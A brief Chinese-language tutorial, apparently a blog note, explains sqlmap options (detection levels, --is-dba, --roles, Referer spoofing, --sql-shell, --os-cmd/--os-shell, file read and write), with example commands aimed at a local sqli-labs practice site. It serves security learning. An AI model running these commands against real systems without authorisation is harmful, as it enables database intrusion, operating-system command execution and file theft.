1.--level探测等级
一共有5个等级,默认是1.
sqlmap使用的payload可以在xml\payloads中看到,也可以根据相应的格式添加自己的payload,5级包含的payload最多。
http cookie在2级时可以检测
HTTP user-Agent/Referer在3级时就会检测
2.--is-dba当前用户是否为管理员权限
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --is-dba
3.--roles列出数据库管理员角色
如果当前用户有权限读取包含所有用户的表,输入该命令会列举出每个用户的角色,
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --roles
4.--referer HTTPReferer头
当--level参数设定为3或3以上时,会尝试对HTTP Referer注入。可以使用referer命令来欺骗,如--referer https://mp.csdn.net
5.--sql-shell运行自定义的sql语句
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --sql-shell
6.--os-cmd,--os-shell运行任意操作系统命令
选择后台语言
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --os-cmd=whoami
选择服务器目录
7.--file-read conf数据库服务器中读取文件
该命令用于读取执行文件,当前用户有权限使用特定的函数时,读取的文件可以是文本,也可以是二进制文件。
8.--file-write --file-dest 上传文件到数据库服务器中
该命令用于写入本地文件到服务器中。